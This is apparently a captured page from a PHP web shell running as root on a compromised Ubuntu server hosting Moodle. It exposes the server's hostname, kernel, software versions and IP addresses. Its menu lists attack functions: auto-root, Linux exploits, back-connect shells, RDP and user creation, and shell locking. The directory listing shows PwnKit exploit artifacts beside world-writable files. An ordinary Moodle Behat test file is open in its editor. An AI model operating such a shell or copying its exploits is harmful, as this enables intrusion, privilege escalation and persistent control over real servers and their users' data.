Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
blocks /
html /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
configuring_html_block.feature
1.74
KB
-rwxrwxrwx
course_block.feature
1.52
KB
-rwxrwxrwx
multiple_instances.feature
1.76
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : course_block.feature
@block @block_html Feature: HTML blocks in a course In order to have one or multiple HTML blocks in a course As a teacher I need to be able to create and change such blocks Scenario: Adding HTML block in a course Given the following "users" exist: | username | firstname | lastname | email | | teacher1 | Terry1 | Teacher1 | teacher@example.com | | student1 | Sam1 | Student1 | student1@example.com | And the following "courses" exist: | fullname | shortname | | Course 1 | C1 | And the following "course enrolments" exist: | user | course | role | | teacher1 | C1 | editingteacher | | student1 | C1 | student | When I log in as "teacher1" And I am on "Course 1" course homepage with editing mode on And I add the "HTML" block And I configure the "(new HTML block)" block And I set the field "Content" to "First block content" And I set the field "HTML block title" to "First block header" And I press "Save changes" And I add the "HTML" block And I configure the "(new HTML block)" block And I set the field "Content" to "Second block content" And I set the field "HTML block title" to "Second block header" And I press "Save changes" And I log out And I log in as "student1" And I am on "Course 1" course homepage And I should see "First block content" in the "First block header" "block" And I should see "Second block content" in the "Second block header" "block"
Close